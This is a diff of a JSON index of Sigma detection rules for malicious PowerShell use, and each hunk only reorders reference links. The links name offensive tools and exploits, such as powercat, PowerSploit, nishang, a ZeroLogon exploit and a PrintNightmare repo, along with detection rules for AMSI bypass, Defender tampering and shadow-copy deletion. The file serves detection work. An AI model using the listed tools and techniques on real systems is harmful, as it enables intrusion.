"https://in.security/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/", + "https://github.com/Neo23x0/signature-base/blob/615bf1f6bac3c1bdc417025c40c073e6c2771a76/yara/gen_susp_lnk_files.yar#L19", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/wmi_event/sysmon_wmi_susp_scripting.yml" ], "tags": [ @@ -21695,8 +21695,8 @@ "logsource.product": "windows", "refs": [ "https://nmap.org/ncat/", - "https://github.com/besimorhino/powercat", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", + "https://github.com/besimorhino/powercat", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_powercat.yml" ], "tags": [ @@ -21729,8 +21729,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://github.com/bohops/WSMan-WinRM", "https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/", + "https://github.com/bohops/WSMan-WinRM", "https://twitter.com/chadtilbury/status/1275851297770610688", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_wsman_com_provider_no_powershell.yml" ], @@ -21882,8 +21882,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_susp_athremotefxvgpudisablementcommand.yml" ], "tags": [ @@ -21985,8 +21985,8 @@ "logsource.category": "ps_classic_start", "logsource.product": "windows", "refs": [ - "https://www.fortinet.com/blog/threat-research/stomping-shadow-copies-a-second-look-into-deletion-methods", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md", + "https://www.fortinet.com/blog/threat-research/stomping-shadow-copies-a-second-look-into-deletion-methods", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_delete_volume_shadow_copies.yml" ], "tags": [ @@ -22278,9 +22278,9 @@ "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ + "https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/", "https://www.mdeditor.tw/pl/pgRt", "https://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/", - "https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_bad_opsec_artifacts.yml" ], "tags": [ @@ -22338,8 +22338,8 @@ "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/8", "https://threathunterplaybook.com/evals/apt29/detections/4.A.3_09F29912-8E93-461E-9E89-3F06F6763383.html", + "https://github.com/OTRF/detection-hackathon-apt29/issues/8", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_decompress_commands.yml" ], "tags": [ @@ -22543,8 +22543,8 @@ "logsource.product": "windows", "refs": [ "https://nmap.org/ncat/", - "https://github.com/besimorhino/powercat", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", + "https://github.com/besimorhino/powercat", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_powercat.yml" ], "tags": [ @@ -23084,8 +23084,8 @@ "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_athremotefxvgpudisablementcommand.yml" ], "tags": [ @@ -23285,8 +23285,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7", "https://attack.mitre.org/datasources/DS0005/", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_gwmi.yml" ], "tags": [ @@ -23319,8 +23319,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell", "https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/", + "https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_web_request_cmd_and_cmdlets.yml" ], "tags": [ @@ -23454,8 +23454,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-10---powershell-invoke-downloadcradle", "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/new-pssession?view=powershell-7.2", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-10---powershell-invoke-downloadcradle", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_remote_session_creation.yml" ], "tags": [ @@ -23578,9 +23578,9 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://www.trendmicro.com/en_id/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html", "https://docs.microsoft.com/en-us/previous-versions/windows/desktop/ms766431(v=vs.85)", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-7---powershell-msxml-com-object---with-prompt", + "https://www.trendmicro.com/en_id/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_msxml_com.yml" ], "tags": [ @@ -23613,8 +23613,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1497.001/T1497.001.md", "https://techgenix.com/malicious-powershell-scripts-evade-detection/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1497.001/T1497.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_detect_vm_env.yml" ], "tags": [ @@ -23717,10 +23717,10 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://adsecurity.org/?p=2277", - "https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon", "https://powersploit.readthedocs.io/en/stable/Recon/README", "https://thedfirreport.com/2020/10/08/ryuks-return", + "https://adsecurity.org/?p=2277", + "https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml" ], "tags": [ @@ -23795,8 +23795,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/", "https://twitter.com/bohops/status/948061991012327424", + "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cl_invocation_lolscript.yml" ], "tags": [ @@ -23862,9 +23862,9 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/send-mailmessage?view=powershell-7.2", "https://www.ietf.org/rfc/rfc2821.txt", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/send-mailmessage?view=powershell-7.2", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_send_mailmessage.yml" ], "tags": [ @@ -23898,8 +23898,8 @@ "logsource.product": "windows", "refs": [ "https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf", - "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_computer_discovery_get_adcomputer.yml" ], "tags": [ @@ -24073,10 +24073,10 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://www.elastic.co/guide/en/security/current/windows-firewall-disabled-via-powershell.html", "https://docs.microsoft.com/en-us/powershell/module/netsecurity/set-netfirewallprofile?view=windowsserver2019-ps", - "http://powershellhelp.space/commands/set-netfirewallrule-psv5.php", "https://www.tutorialspoint.com/how-to-get-windows-firewall-profile-settings-using-powershell", + "http://powershellhelp.space/commands/set-netfirewallrule-psv5.php", + "https://www.elastic.co/guide/en/security/current/windows-firewall-disabled-via-powershell.html", "http://woshub.com/manage-windows-firewall-powershell/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_windows_firewall_profile_disabled.yml" ], @@ -24110,8 +24110,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.accountmanagement?view=dotnet-plat-ext-6.0", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.002/T1136.002.md#atomic-test-3---create-a-new-domain-account-using-powershell", + "https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.accountmanagement?view=dotnet-plat-ext-6.0", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_directoryservices_accountmanagement.yml" ], "tags": [ @@ -24236,9 +24236,9 @@ "logsource.product": "windows", "refs": [ "https://youtu.be/5mqid-7zp8k?t=2481", + "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", - "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_mailboxexport_share.yml" ], "tags": [ @@ -24447,8 +24447,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://www.powershellgallery.com/packages/DSInternals", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.006/T1003.006.md#atomic-test-2---run-dsinternals-get-adreplaccount", + "https://www.powershellgallery.com/packages/DSInternals", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_adreplaccount.yml" ], "tags": [ @@ -24507,8 +24507,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://adsecurity.org/?p=2604", "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1", + "https://adsecurity.org/?p=2604", "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_set_policies_to_unsecure_level.yml" ], @@ -24566,8 +24566,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/unblock-file?view=powershell-7.2", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-3---remove-the-zoneidentifier-alternate-data-stream", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/unblock-file?view=powershell-7.2", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_unblock_file.yml" ], "tags": [ @@ -24692,8 +24692,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/dism/disable-windowsoptionalfeature?view=windowsserver2022-ps", "https://github.com/redcanaryco/atomic-red-team/blob/5b67c9b141fa3918017f8fa44f2f88f0b1ecb9e1/atomics/T1562.001/T1562.001.md", + "https://docs.microsoft.com/en-us/powershell/module/dism/disable-windowsoptionalfeature?view=windowsserver2022-ps", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml" ], "tags": [ @@ -24999,8 +24999,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://t.co/ezOTGy1a1G", "https://twitter.com/JohnLaTwC/status/850381440629981184", + "https://t.co/ezOTGy1a1G", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_prompt_credentials.yml" ], "tags": [ @@ -25226,8 +25226,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://bi-zone.medium.com/from-pentest-to-apt-attack-cybercriminal-group-fin7-disguises-its-malware-as-an-ethical-hackers-c23c9a75e319", "https://github.com/sense-of-security/ADRecon/blob/11881a24e9c8b207f31b56846809ce1fb189bcc9/ADRecon.ps1", + "https://bi-zone.medium.com/from-pentest-to-apt-attack-cybercriminal-group-fin7-disguises-its-malware-as-an-ethical-hackers-c23c9a75e319", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_adrecon_execution.yml" ], "tags": [ @@ -25423,8 +25423,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/nettcpip/test-netconnection?view=windowsserver2022-ps", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1571/T1571.md#atomic-test-1---testing-usage-of-uncommonly-used-port-with-powershell", + "https://docs.microsoft.com/en-us/powershell/module/nettcpip/test-netconnection?view=windowsserver2022-ps", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_test_netconnection.yml" ], "tags": [ @@ -25481,8 +25481,8 @@ "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps", "https://bidouillesecurity.com/disable-windows-defender-in-powershell/", + "https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_tamper_defender.yml" ], "tags": [ @@ -25595,8 +25595,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/Gerenios/AADInternals", "https://o365blog.com/aadinternals/", + "https://github.com/Gerenios/AADInternals", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_aadinternals_cmdlets_execution.yml" ], "tags": [ @@ -25742,8 +25742,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md", "http://www.powertheshell.com/ntfsstreams/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_ntfs_ads_access.yml" ], "tags": [ @@ -25785,8 +25785,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md#atomic-test-11---get-aduser-enumeration-using-useraccountcontrol-flags-as-rep-roasting", "https://shellgeek.com/useraccountcontrol-flags-to-manipulate-properties/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md#atomic-test-11---get-aduser-enumeration-using-useraccountcontrol-flags-as-rep-roasting", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_as_rep_roasting.yml" ], "tags": [ @@ -25844,8 +25844,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md", "https://www.offensive-security.com/metasploit-unleashed/timestomp/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_timestomp.yml" ], "tags": [ @@ -25911,8 +25911,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.006/T1564.006.md#atomic-test-3---create-and-start-hyper-v-virtual-machine", "https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/quick-start/enable-hyper-v", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.006/T1564.006.md#atomic-test-3---create-and-start-hyper-v-virtual-machine", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_hyper_v_condlet.yml" ], "tags": [ @@ -25945,8 +25945,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/get-acl?view=powershell-7.2", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-1---service-registry-permissions-weakness", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/get-acl?view=powershell-7.2", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_acl_service.yml" ], "tags": [ @@ -25970,8 +25970,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7", "https://attack.mitre.org/datasources/DS0005/", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_create_volume_shadow_copy.yml" ], "tags": [ @@ -26004,8 +26004,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7.2", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-1---enable-windows-remote-management", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7.2", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enable_psremoting.yml" ], "tags": [ @@ -26183,9 +26183,9 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", "https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1", "https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py", + "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmi_unquoted_service_search.yml" ], "tags": [ @@ -26218,8 +26218,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://twitter.com/cyb3rops/status/1588574518057979905?s=20&t=A7hh93ONM7ni1Rj1jO5OaA", "https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/", + "https://twitter.com/cyb3rops/status/1588574518057979905?s=20&t=A7hh93ONM7ni1Rj1jO5OaA", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_amsi_bypass_pattern_nov22.yml" ], "tags": [ @@ -26311,8 +26311,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md#atomic-test-5---getcurrent-user-with-powershell-script", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md#atomic-test-4---user-discovery-with-env-vars-powershell-script", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md#atomic-test-5---getcurrent-user-with-powershell-script", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_current_user.yml" ], "tags": [ @@ -26336,8 +26336,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_user_discovery_get_aduser.yml" ], "tags": [ @@ -26361,8 +26361,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/", "https://twitter.com/bohops/status/948061991012327424", + "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cl_invocation_lolscript_count.yml" ], "tags": [ @@ -26724,9 +26724,9 @@ "logsource.product": "windows", "refs": [ "https://gist.github.com/MHaggis/0dbe00ad401daa7137c81c99c268cfb7", - "https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/CodeExecution/Invoke-ReflectivePEInjection.ps1", "https://posts.specterops.io/entering-a-covenant-net-command-and-control-e11038bcf462", "https://github.com/hlldz/Phant0m/blob/30c2935d8cf4aafda17ee2fab7cd0c4aa9a607c2/old/Invoke-Phant0m.ps1", + "https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/CodeExecution/Invoke-ReflectivePEInjection.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_keywords.yml" ], "tags": [ @@ -26850,8 +26850,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036.003/T1036.003.md", "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Start-Process?view=powershell-5.1&viewFallbackFrom=powershell-7", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036.003/T1036.003.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_start_process.yml" ], "tags": [ @@ -27120,8 +27120,8 @@ "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system", - "https://learn.microsoft.com/en-us/windows/wsl/install-on-server", "https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps", + "https://learn.microsoft.com/en-us/windows/wsl/install-on-server", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enable_windowsoptionalfeature.yml" ], "tags": [ @@ -27144,10 +27144,10 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://www.virustotal.com/gui/file/d4486b63512755316625230e0c9c81655093be93876e0d80732e7eeaf7d83476/content", - "https://learn.microsoft.com/en-us/dotnet/api/system.windows.input.keyboard.iskeydown?view=windowsdesktop-7.0", "https://twitter.com/ScumBots/status/1610626724257046529", + "https://learn.microsoft.com/en-us/dotnet/api/system.windows.input.keyboard.iskeydown?view=windowsdesktop-7.0", "https://www.virustotal.com/gui/file/720a7ee9f2178c70501d7e3f4bcc28a4f456e200486dbd401b25af6da3b4da62/content", + "https://www.virustotal.com/gui/file/d4486b63512755316625230e0c9c81655093be93876e0d80732e7eeaf7d83476/content", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_keylogger_activity.yml" ], "tags": [ @@ -27326,19 +27326,19 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ + "https://github.com/calebstewart/CVE-2021-1675", + "https://github.com/samratashok/nishang", + "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", - "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", "https://adsecurity.org/?p=2921", - "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", "https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html", - "https://github.com/calebstewart/CVE-2021-1675", - "https://github.com/HarmJ0y/DAMP", "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", - "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", - "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", + "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", + "https://github.com/HarmJ0y/DAMP", "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1", - "https://github.com/samratashok/nishang", + "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", + "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_malicious_commandlets.yml" ], "tags": [ @@ -27443,8 +27443,8 @@ "logsource.product": "windows", "refs": [ "https://stefanos.cloud/blog/kb/how-to-clear-the-powershell-command-history/", - "https://www.shellhacks.com/clear-history-powershell/", "https://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics", + "https://www.shellhacks.com/clear-history-powershell/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_clearing_windows_console_history.yml" ], "tags": [ @@ -27585,9 +27585,9 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=42", "https://learn.microsoft.com/en-us/dotnet/api/microsoft.hpc.scheduler.store.cx509enrollmentwebclassfactoryclass?view=hpc-sdk-5.1.6115", 